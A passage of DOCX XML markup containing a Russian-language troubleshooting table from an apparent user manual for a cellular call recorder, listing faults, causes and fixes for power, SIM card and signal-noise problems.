          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>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519"/>
        <w:gridCol w:w="3662"/>
        <w:gridCol w:w="3590"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="313"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2519" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Неисправность</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3662" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Возможная причина</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3590" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Необходимые действия</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="003A66C2" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="1588"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2519" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Сотовый регистратор не включается, светодиоды не</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>горят</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3662" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="468"/>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Нет напряжения в</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>сети.</w:t>
            </w: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C2668F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="42"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="468"/>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Неисправен</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:spacing w:val="-10"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>сетевой адаптер.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3590" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="41"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="468"/>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Проверить наличие напряжения и исправность розетки.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="41"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="468"/>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Обратится в службу технической</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:spacing w:val="-4"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>поддержки.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="3162"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2519" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Невозможно осуществить исходящий звонок</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3662" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="40"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="468"/>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Не установлена SIM- карта.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="40"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="468"/>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Несовместимая SIM- карта.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="40"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="468"/>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">Установлена защита </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>SIM</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">-карты </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>PIN</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>-кодом.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="40"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="468"/>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">Нет средств на счете </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>SIM</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>-карты.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3590" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="468"/>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Установить</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:spacing w:val="-1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>SIM-карту.</w:t>
            </w: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C2668F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="468"/>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Заменить</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:spacing w:val="-1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>SIM-карту.</w:t>
            </w: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C2668F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="468"/>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Снять защиту</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>PIN-кодом.</w:t>
            </w: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C2668F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="468"/>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Пополнить счет SIM-карты.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00433A6D" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="4441"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2519" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>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523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Шумы, прерывания голоса</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3662" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="38"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="468"/>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">Слишком близкое расположение </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>GSM</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>- антенны к регистратору либо аналоговым телефонным проводам (линиям).</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="38"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="468"/>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Низкий уровень приема сигнала.</w:t>
            </w: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C2668F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="38"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="468"/>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Неисправность микрофона /динамика абонентского</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:spacing w:val="-4"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>телефона.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3590" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="37"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="468"/>
                <w:tab w:val="left" w:pos="993"/>
                <w:tab w:val="left" w:pos="10206"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="132"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">Закрепить </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>GSM</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>-антенну на удалении от регистратора и телефонных проводов</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:spacing w:val="-4"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>(линий).</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
